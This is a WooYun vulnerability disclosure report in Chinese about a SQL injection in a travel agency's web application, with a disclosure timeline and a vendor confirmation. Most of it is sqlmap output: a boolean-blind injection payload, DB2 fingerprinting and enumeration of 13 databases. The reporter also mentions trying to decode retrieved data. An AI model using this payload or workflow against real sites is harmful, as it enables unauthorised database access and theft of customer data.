乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-01: 细节已通知厂商并且等待厂商处理中 2015-11-05: 厂商已经确认,细节仅向厂商公开 2015-11-15: 细节向核心白帽子及相关领域专家公开 2015-11-25: 细节向普通白帽子公开 2015-12-05: 细节向实习白帽子公开 2015-12-20: 细节向公众公开
求走大厂商呀
十大旅行社之一 请看:
说正事注入点:
http://**.**.**.**/account/getxytg?filetype=G
GET parameter 'filetype' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection point(s) with a total of 82 HTTP(s) requests:---Parameter: filetype (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: filetype=G' AND 7406=7406 AND 'PPbT'='PPbT---[15:49:14] [INFO] testing MySQL[15:49:14] [WARNING] the back-end DBMS is not MySQL[15:49:14] [INFO] testing Oracle[15:49:35] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request(s)[15:49:36] [WARNING] the back-end DBMS is not Oracle[15:49:36] [INFO] testing PostgreSQL[15:49:36] [WARNING] the back-end DBMS is not PostgreSQL[15:49:36] [INFO] testing Microsoft SQL Server[15:49:36] [WARNING] the back-end DBMS is not Microsoft SQL Server[15:49:36] [INFO] testing SQLite[15:49:36] [WARNING] the back-end DBMS is not SQLite[15:49:36] [INFO] testing Microsoft Access[15:49:36] [WARNING] the back-end DBMS is not Microsoft Access[15:49:36] [INFO] testing Firebird[15:49:37] [WARNING] the back-end DBMS is not Firebird[15:49:37] [INFO] testing SAP MaxDB[15:49:37] [WARNING] the back-end DBMS is not SAP MaxDB[15:49:37] [INFO] testing Sybase[15:49:37] [WARNING] the back-end DBMS is not Sybase[15:49:37] [INFO] testing IBM DB2[15:49:37] [INFO] confirming IBM DB2[15:49:41] [INFO] the back-end DBMS is IBM DB2web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: IBM DB2[15:49:41] [WARNING] schema names are going to be used on IBM DB2 for enumeration as the counterpart to database names on other DBMSes[15:49:41] [INFO] fetching database (schema) names[15:49:41] [INFO] fetching number of databases[15:49:41] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[15:49:41] [INFO] retrieved: 13[15:49:43] [INFO] retrieved:[15:50:05] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request(s)o[15:50:30] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request(s)vm
有13个数据库既然排名第三的旅行社 数据量绝对不小^_^
由于是不常见的IBM DB2数据库 于是某几个库是乱码:
该如何解决乱码问题呢?试了几种编码都不行。。。
危害等级:中
漏洞Rank:8
确认时间:2015-11-05 14:52
暂未建立与网站管理单位的直接处置渠道,待认领。
暂无